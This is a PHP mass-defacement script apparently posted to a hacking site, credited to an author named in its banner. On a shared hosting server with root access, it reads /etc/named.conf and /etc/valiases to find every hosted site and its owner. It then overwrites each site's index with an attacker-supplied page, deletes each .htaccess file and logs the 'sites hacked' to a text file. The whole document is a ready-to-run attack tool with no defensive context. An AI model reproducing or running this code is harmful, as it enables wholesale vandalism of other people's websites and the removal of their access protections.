Mass defaces root user | www.pemula.info

1. <?
2.  
3. print_r("
4.  
5. #--------------------------------------------------\
6. # Tool name : Mass Sa v1.0 |
7. # Programmer : al-swisre | < Saudi Arabia > |
8. # Email : oy3@hotmail.com |
9. #--------------------------------------------------/
10.  
11.  
12. \n");
13.  
14.  
15. if(!$argv[1]){
16.  
17. print_r("
18.  
19. -------------------------------------\
20. USAGE : php mass_sa.php [Your index] |
21. Ex : php mass_sa.php index.htm |
22. -------------------------------------/
23.  
24. ");
25. die();
26.  
27. }
28.  
29.  
30.  
31. $d00m = @file("/etc/named.conf");
32.  
33. if(!$d00m)
34. {
35. die (" can't read /etc/named.conf");
36. }
37. else
38.  
39. {
40. $f =@fopen ('shack.txt','w');
41.  
42. foreach($d00m as $dom){
43.  
44. if(eregi("zone",$dom)){
45.  
46. preg_match_all('#zone "(.*)"#', $dom, $domsws);
47.  
48.  
49. if(strlen(trim($domsws[1][0])) > 2){
50.  
51. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
52.  
53. $site = $user['name'] ;
54.  
55. $file = $argv[1];
56.  
57. $file2 = @file("$file");
58.  
59. $dom3n = $domsws[1][0];
60.  
61. if (empty($file2))
62. {
63. print_r("file $file not here !
64.  
65. " );
66. exit;
67. }
68. else {
69.  
70.  
71.  
72. $copy = @copy("$file","/home/".$user['name']."/public_html/$file");
73.  
74. if ($copy)
75. {
76.  
77. @system("rm /home/".$user['name']."/public_html/.htaccess");
78.  
79. print_r("$dom3n <-- done \n \n");
80.  
81. @fwrite($f,"$dom3n \n" );
82.  
83. }else
84. {
85. print_r("$dom3n <-- error ! \n \n");
86.  
87.  
88.  
89. }
90. }
91. }
92. }
93. }
94. }
95.  
96.  
97.  
98. print_r("
99. \n\n
100. #--------------------------------------------------\
101. # sites hacked in a shack.txt ^_* |
102. # al-swisre _ oy3@hotmail.com |
103. #--------------------------------------------------/
104.  
105.  
106. \n");
107.  
108.  
109.  
110. ?>